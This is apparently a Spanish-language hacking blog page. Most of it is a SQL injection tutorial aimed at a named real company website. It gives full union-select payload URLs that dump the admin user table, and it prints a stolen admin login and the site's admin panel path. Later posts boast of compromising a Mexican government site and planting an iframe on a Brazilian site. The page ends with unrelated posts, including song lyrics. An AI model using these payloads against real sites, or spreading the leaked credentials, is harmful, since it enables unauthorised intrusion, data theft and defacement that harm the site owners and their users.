Tutorial Ijection SQL

##########################################################################################
## TUTORIAL INJECTION SQL By Gothic-X ##
## ##
## Greetz: Version 1.1 ##
## || Zer0-z0oRg || Zues || Kaos || Dont.Cool || Murder || Knet || Fr34k || ##
## ##
## www.undermx.blogspot.com ##
## ##
## ##
## ##
##########################################################################################

WEB: http://directinformatica.es/
METODO DE ATAQUE: SQL INJECTION

Bueno empesaremos con buscar la parte de la web donde es vulnerable en este caso sera en
http://directinformatica.es/detalle.php?id= verificamos si es vulnerable haciendo una
consulta con solo ponerle ( ' ) una coma.
efectivamente este sitio es vulnerable a sql, como savemos? por que nos arrojo un mensaje de
error el cual es el siguiente.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gedraqxj/public_html/detalle.php on line 35

el cual nos indica que es vulnerable. bueno agora buscaremos cuantas columnas tiene el sitio agregando
lo siguiente al fina de la url de la web ( detalle.php?id=-1+union+select+0,1,2,3,4,..., en este caso tiene
9 columnas osea quedaria de la siguienteforma.

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,8--

entrando veremos que nos arrojo unos numeritos en la web en este caso fueron : 8 , 4 , 2 .

ya estando aqui veremos si la web tiene information schema de manera que quede de esta forma:
agregando al final +from+information_schema.tables-- y reemplazando cualquiera de los numeros
nos arrojo la web por table_name quedando la url de la aiguiente manera;

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema--

perfecto nos arrojo un texto CHARACTER_SETS el cual es una tabla y con eso confirmamos que tiene
information schema, ahora buscaremos la tabla de usuario, usuarios o admin agregando al final
+limit+1,1-- y quedaria de esta forma:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+1,1--

ahora para que encontremos la tabla deseada avansaremos en el primer uno del limit de la siguiente manera. +limit+2,1--
hasta ncontrar la tabla deseada. en esta web se tubo que avansar 20 para la tabla deseada y quedo de la siguiente manera
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+20,1--
y nos dio como resultado: adm_usuario
ahora como ver lo que esta dentro de la tabla, osea ver las columnas, bueno primero convertiremos la tabla a hexadecimal
usualmente uso esta herramienta http://hwagm.elhacker.net/php/sneak.php, bueno nos dio como resultado: 61646d5f7573756172696f
bueno al final de la url de la injection aditaremos el final reemplazando .tables+limit+20+1-- por columns+where(table_name=0xaquitabalaenhex)-- y
donde tenemos table_name lo reemplazamos por column_name y nos quedaria de la siguiente manera.
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,column_name+from+information_schema.columns+where(table_name=0x61646d5f7573756172696f)--
y vemos que nos arroja las columnas y para ir encontrando las columnas deseadas avansamos con +limit+1,1-- cambiando el 1 por 2 y asi susesivamente
hasta encontrar las columnas deseadas.
en esta web encontramos las siguientes columnas:
id_user, id_tipo, nomb_user , nick_user , pass_user , acti_user
bien ya con esas tenemos las esenciales que son nomb_user y pass_user.
ahora como vemos dentro de las columnas? bueno solo reemplazamos el fina despues de +from+ y agregamos el nombre de la tabla que es
adm_usuario y donde tenemos column_name reemplazamos por concat(columna,0x3a,columna) el 0x3a esta en hexadecimal y es ( : ), entonces
nos quedaria de la siguiente manera nuestra url:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,concat(nick_user,0x3a,pass_user)+from+adm_usuario--
y nos arrojara nuestra informacion deseada que es la siguiente: admin:matias1
ahora solo nos falta encontrar el admin panel, en la siguiente web es http://directinformatica.es/cms/
y nos logeamos y hacemos lo que tengamos que hacer.

THE END.

http://www.santaclara.gob.mx/ Owned

Bueno aqui seguimos demostrando la inseguridad del Gobierno de mexico.
un Owned mas al Gobierno.
Web: H. Ayuntamiento de Salvador Escalante
Url: http://www.santaclara.gob.mx/
Mirror: http://www.zone-h.org/mirror/id/8982580
Tipo de ataque: Sql Inyection.
screen:

dicadeteatro.com.br Owned

bueno aqui les dejo una web mas owneada x mi amm metodo sql inyecction
ahi nada mas le agregue un pequeño iframe xD lolazo yo y en fin espero que les guste
http://dicadeteatro.com.br/

MiniMetraje Minimalista

Navegando sobre los blogs de los amigos informaticos encontre en Èter Blog un post algo especial.
este es un minimetraje que es? bueno aqui se los dejo para que lo vean y digan que ven.

http://eterblog.com/2009/05/21/videos/minimetraje-minimalista/

opinen y observen con mucho cuidado. :p

Saludos a Oscar Rovira creador del minimitraje

Ayer pedi que te murieras - Victor Garcia

Pues sin nada mas que decir...


AYER PEDI QUE TE MURIERAS
QUE TE CARGARA LA TRISTEZA
QUE TODO EL MUNDO TE OLVIDARA
QUE TU BELLEZA SE ACABARA
PARA QUE NADIE TE QUISIERA

AYER PEDI CON TANTA FUERZA
QUE TODO EL MAL QUE HAY EN LA TIERRA
SOBRE LA ESPALDA TE CAYERA
PARA QUE YO LO DISFRUTARA
PARA QUE TU LO PADECIERAS

--CORO--
AYER PEDI QUE TE MURIERAS
POR QUE TE ODIO DE ADEVERAS
PERO ESTE IDIOTA CORAZON
QUE ES MUCHO MAS FUERTE QUE YO
TAMBIEN ME OBLIGA A QUE TE QUIERA.

ESTOY A PUNTO DE VOLVERME LOCO
POR QUE TE AMO COMO A NADIE
POR QUE JAMAS PODRE ARRANCARME TUS CARICIAS DE MI PIEL

ESTOY A PUNTO DE VOLVERME LOCO POR QUE JAMAS VOY A OLVIDARTE POR QUE TENDRE QUE ACOSTUMBRARME A VIVIR AMANDOTE, ALGUNA CULPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINE.


AYER PEDI CON TANTA FUERZA QUE TODO EL MAL QUE HAY EN LA TIERRA SOBRE LA ESPALDA TE CALLERA, PARA QUE YO LO DISFRUTARA PARA QUE TU LO PADECIERAS

AYER PEDI QUE TE MURIERAS POR QUE TE ODIO DE ADEVERASPERO ESTE IDIOTA CORAZON QUE ES MUCHO MAS FUERTE QUE YO TAMBIEN ME OBLIGA A QUE TE QUIERA.

ESTOY A PUNTO DE VOLVERME LOCO POR QUE TE AMO COMO A NADIE POR QUE JAMAS PODRE ARRANCARME TUS CARICIAS DE MI PIEL, ESTOY A PUNTO DE VOLVERME LOCO POR QUE JAMAS PODRE OLVIDARTE POR QUE TENDRE QUE CONSTUMBRARME A VIVR AMANDOTE, ALGUNA CUMPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINE.

ALGUNA CULPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINEEE

Y HOY SOLO QUIERO QUE TU VUELVAS.